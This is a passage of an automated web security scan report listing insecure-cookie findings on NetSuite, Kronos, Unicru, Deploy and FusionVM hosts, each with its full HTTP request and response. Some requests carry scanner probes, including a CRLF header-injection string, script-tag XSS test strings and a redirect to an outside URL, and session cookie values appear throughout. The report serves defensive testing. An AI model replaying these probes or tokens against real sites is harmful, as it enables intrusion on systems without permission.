The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkera2b9f56d99bc43aa9ec216d3c99aa80b.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:08:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1112884952:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=kpy0N1TTsKDkPgBGQZchFwhNP2xxQDtJvfwQVvtynWwgQLL0vwPLg1KTvflJQHp8yCnphBG9nfKqGrnvy0Cy2pxD6Br4LW1B7KYyndJyk1mBF7whWgydLzFw85SwJwvl!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.10. https://checkout.netsuite.com/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=pmQ9N1TXzfvBjH2mhF3Q1jKgWhcfCCjndsRvYYL3lv5kb0VQfGTyhhQQQbjmYcLvyCNhp8Kf20GD1QlTR1F2jfcsTn5Lr1hW0SLCmSrGVSrcZnXL5rhglQsqv9ZFVhG2!-979559123; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/Netsparkerb8e355f2184b49a497b4b297f62d93f9.nl HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 15:07:38 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2144353504:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=pmQ9N1TXzfvBjH2mhF3Q1jKgWhcfCCjndsRvYYL3lv5kb0VQfGTyhhQQQbjmYcLvyCNhp8Kf20GD1QlTR1F2jfcsTn5Lr1hW0SLCmSrGVSrcZnXL5rhglQsqv9ZFVhG2!-979559123; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 2024

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&
...[SNIP]...

11.11. https://checkout.netsuite.com/core/styles/pagestyles.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/core/styles/pagestyles.nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=tXQJN1GWSQGJhxgnQLglP9K2nC3JgRj49hbDh6pTpzfsTnRKQQ1Dk0D1X5PfwJGyCLhxyJQfpJxpGHzCJV4sK1VsMCzpln6GNyht1gnPJpDGpHp3rdQFqyYz8rzCzbJN!-1435542349; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/pagestyles.nl?ct=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:02 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:02 GMT
NS_RTIMER_COMPOSITE: -1134201633:616363742D6A6176613036312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=tXQJN1GWSQGJhxgnQLglP9K2nC3JgRj49hbDh6pTpzfsTnRKQQ1Dk0D1X5PfwJGyCLhxyJQfpJxpGHzCJV4sK1VsMCzpln6GNyht1gnPJpDGpHp3rdQFqyYz8rzCzbJN!-1435542349; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 67958

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...

11.12. https://checkout.netsuite.com/pages/portal/css/main.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/pages/portal/css/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=2ln9N1PQC1pBlnRWMG11FTSzZ6Q7LFs2lFNbJYnZ9dvJs5NzSj9RQKLJB0jQbCcLrsWnHTJhh0vdnB0mgnkmGyrxYmLv5WCDzrjppnpZy6JLTGMDpZ7c9R9LvKTjTMqt!-1598522165; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/css/main.css?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00007E)%3C/script%3E HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:12:54 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: 225122148:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=2ln9N1PQC1pBlnRWMG11FTSzZ6Q7LFs2lFNbJYnZ9dvJs5NzSj9RQKLJB0jQbCcLrsWnHTJhh0vdnB0mgnkmGyrxYmLv5WCDzrjppnpZy6JLTGMDpZ7c9R9LvKTjTMqt!-1598522165; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css
Content-Length: 2044

td, p        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #333333;
   font-size: 11px;
}

.blueSubhead        {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #004584;
   font-weight:
...[SNIP]...

11.13. https://checkout.netsuite.com/pages/portal/page_not_found.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/pages/portal/page_not_found.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0K8PN1GJqgGn0JkkHrzfLxHcVjNhkHczxJ5J34JfcXdnJGwzK09nybznnTnCvp8D498vLcRWvvh2CF7BJVDVQrVtHmgnlt8tVTVJzTsP1cDqMsf7gd27xTwt1BJB9BL4!-1927254259; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:59 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -690374290:616363742D6A6176613038362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=0K8PN1GJqgGn0JkkHrzfLxHcVjNhkHczxJ5J34JfcXdnJGwzK09nybznnTnCvp8D498vLcRWvvh2CF7BJVDVQrVtHmgnlt8tVTVJzTsP1cDqMsf7gd27xTwt1BJB9BL4!-1927254259; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 11320

<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...

11.14. https://checkout.netsuite.com/s.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://checkout.netsuite.com
Path:	/s.nl

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; path=/
NLVisitorId=rcHW8495AWICDiX0; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700514546:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; path=/
Set-Cookie: NLVisitorId=rcHW8495AWICDiX0; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=869
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2244

<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...

11.15. https://customer.kronos.com/Default.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://customer.kronos.com
Path:	/Default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
KronosCust=LogIn=false; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD /Default.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
Cache-control: private

11.16. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
KTMDWestLB=993264394.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
Host: employer.unicru.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 42vm
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=993264394.20736.0000; path=/

<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

11.17. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDSAATCQTA=MGBECJJCAMBAEKDDNHDKHNIH; path=/
KTMDWestLB=184615946.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: employer.unicru.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 43
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAATCQTA=MGBECJJCAMBAEKDDNHDKHNIH; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=184615946.20736.0000; path=/

<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...

11.18. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDSSRADQTB=EINNMKJCGHFFJHCJOHNLPDMM; path=/
Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
KTMDWestLB=1211368202.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:50:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDSSRADQTB=EINNMKJCGHFFJHCJOHNLPDMM; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=1211368202.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>

11.19. https://employer.unicru.com/asp/home/login.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://employer.unicru.com
Path:	/asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASPSESSIONIDQCDRBTRC=NNLPKKJCDHNIPJJGHAECJHGA; path=/
Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
KTMDWestLB=385942538.20736.0000; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:52:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDQCDRBTRC=NNLPKKJCDHNIPJJGHAECJHGA; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=385942538.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>

11.20. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=d8308cb242bf2b615f7a;path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hmc/report/ HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:30 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d8308cb242bf2b615f7a;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4789

...[SNIP]...

11.21. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=3e307db0b53d142e16b3;path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hmc/report/index.cfm?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 102

email=netsparker%40example.com&j_password=3&j_passwordconfirm=3&j_username=Smith&name=Smith&storenum=3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e307db0b53d142e16b3;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...

11.22. https://www.fusionvm.com/FusionVM/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.fusionvm.com
Path:	/FusionVM/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=z4su31o2100elwiksplqkftw; path=/; HttpOnly
CriticalWatch_WinMgmt=a623626d-8fc7-42a5-b103-e9b75ad79594; expires=Mon, 25-Apr-2011 13:19:53 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FusionVM/ HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: CriticalWatch_WinMgmt=a623626d-8fc7-42a5-b103-e9b75ad79594; expires=Mon, 25-Apr-2011 13:19:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=z4su31o2100elwiksplqkftw; path=/; HttpOnly
Date: Mon, 25 Apr 2011 12:54:52 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2>
</body></html>

11.23. https://checkout.netsuite.com/s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://checkout.netsuite.com
Path:	/s

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NLShopperId=rcHW8495AYQCDmZk; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

HEAD /s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=G4QzN1GchdfPr9rBJblBVPSQ5Jt63Zmb6JGBswSzDh2vP1LYSpzFqQ8ySNfk1fymwpy48cGyMdHsh0Qm2hgLvMGK1fgWxg2xsZBXTmhKB8Q22BrCVLQTv4mvdvnrtvGT!-1220802186; NLVisitorId=rcHW8495AXQCDpzW; NLShopperId=rcHW8495AYQCDmZk; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 14:26:37 GMT
Server: Apache
Location: http://shopping.netsuite.com/s.nl?alias=s&c=438708&n=1
Expires: 0
NS_RTIMER_COMPOSITE: 668885514:616363742D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLShopperId=rcHW8495AYQCDmZk; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect to shopping server for shopping requests
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8

11.24. https://customer.kronos.com/Default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/Default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ICRedirect=Url=nsextt%3D%252527%252522%2D%2D%25253E%25253C%25252Fstyle%25253E%25253C%25252Fscript%25253E%25253Cscript%25253Enetsparker%2525280x000003%252529%25253C%25252Fscript%25253E; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.asp?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000003%2529%253C%252Fscript%253E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Cookie: ICRedirect=Url=nsextt%3D%27%2522%2D%2D%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Enetsparker%280x000002%29%253C%2Fscript%253E; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=FKMMPBCAJIEPPLMFHLPCHMNK
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
